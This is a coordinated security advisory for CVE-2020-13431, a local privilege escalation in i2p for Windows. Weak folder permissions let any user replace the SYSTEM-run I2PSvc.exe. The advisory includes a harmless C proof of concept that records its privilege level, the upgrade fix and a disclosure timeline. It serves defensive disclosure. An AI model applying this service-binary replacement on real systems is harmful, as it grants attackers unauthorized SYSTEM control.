Security advisory: i2p for Windows local privilege escalation

security research, advisory, i2p, vulnerability, privilege escalation

Advisory information

Title: i2p for Windows local privilege escalation
Advisory reference: BLAZE-02-2020
Product: i2p 0.7.5 to 0.9.45 for Windows
CVE reference: CVE-2020-13431
Disclosure mode: Coordinated

Product description

i2p (The Invisible Internet Project) is an anonymous network, exposing a simple layer that applications can use to anonymously and securely send messages to each other.

Frequently, I2P is compared to Tor as an anonymity tool.

Vulnerability details

During the installation process, the I2P Windows client offers to install itself also as a service, named I2PSvc.

It runs as SYSTEM and runs upon the start up of the operating system. While inspecting I2P for Windows, it was noticed it installs itself in Program Files with very lax permissions, allowing any user to replace I2PSvc.exe for a malicious executable.

To exploit the vulnerability, an attacker must have an unprivileged local account in the system.

This vulnerability has been found in the latest version 0.9.45 but affected i2p since 0.7 series of releases from over a decade ago.

I2P installs itself in C:\Program Files\i2p.

As can be seen below, the “F” permission for BUILTIN\Users means all users within the system have full control over the directory and its subfolders:

cacls

By replacing the service executable with a malicious one, an attacker can execute code with SYSTEM privileges.

Proof of concept

Below we can see the weak permissions of the i2p service:

weakperms1

i2psvc-permissions

The following C code serves as a proof of concept to demonstrate the attack. It will create a text file in the desktop folder of the user lowpriv with the contents displaying the current permission level the executable is running on.

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winbase.h>
#include <lmcons.h>

int main()
{
    TCHAR username[UNLEN + 1];
    TCHAR szFileName[MAX_PATH];
    DWORD username_len = UNLEN + 1;
    char msg[256];
    FILE *fp;
    char *file = "C:\\Users\\lowpriv\\Desktop\\hello.txt";

    GetUserName((TCHAR *)username, &username_len);
    GetModuleFileName(NULL, szFileName, MAX_PATH);

    if(!strcmp(username, "SYSTEM")) {
        snprintf(msg, sizeof(msg)-1, "%s is running as %s. Privilege escalation successful.\n", szFileName, username);
    }
    else {
        snprintf(msg, sizeof(msg)-1, "%s is running as %s\n", szFileName, username);
    }

    printf("%s\n", msg);

    fp = fopen(file, "a+");

    if(fp != NULL) {
            fputs(msg, fp);
            fclose(fp);
    }

    return 0;
}

hello-txt

Fix and recommendations

Upgrade i2p to version v0.9.46.

Credits

This vulnerability was discovered and researched by Julio Cesar Fort from
Blaze Information Security (https://www.blazeinfosec.com)

Disclosure timeline

28/04/2020: Vulnerability reported to [email protected];
01/05/2020: I2P product security team confirmed they managed to reproduce the vulnerability;
16/05/2020: I2P contacted Blaze to inform the patch has been created and asked for validation;
24/05/2020: Blaze sent I2P a message saying the patch fixes the vulnerability accordingly;
25/05/2020: MITRE assigned CVE-2020-13431 for this issue;
25/05/2020: i2p informed Blaze that nearly all network nodes will be upgraded to the latest version in the next 48 hours;
29/05/2020: Advisory released.

References

About Blaze Information Security

Blaze Information Security is a privately held, independent information security firm born from years of combined experience. With presence in South America and Europe, Blaze has a team of senior security engineers with past experience in leading information security consulting companies around the world and a proven track record of published security research.

E-Mail: [email protected]
Wildfire Labs blog: https://blog.blazeinfosec.com
Twitter: https://www.twitter.com/blazeinfosec
Github: https://www.github.com/blazeinfosec

PGP key fingerprint: DB53 D9D9 F0E1 E513 4F52 8219 C33B C7FA C5D0 E926

Share

Comments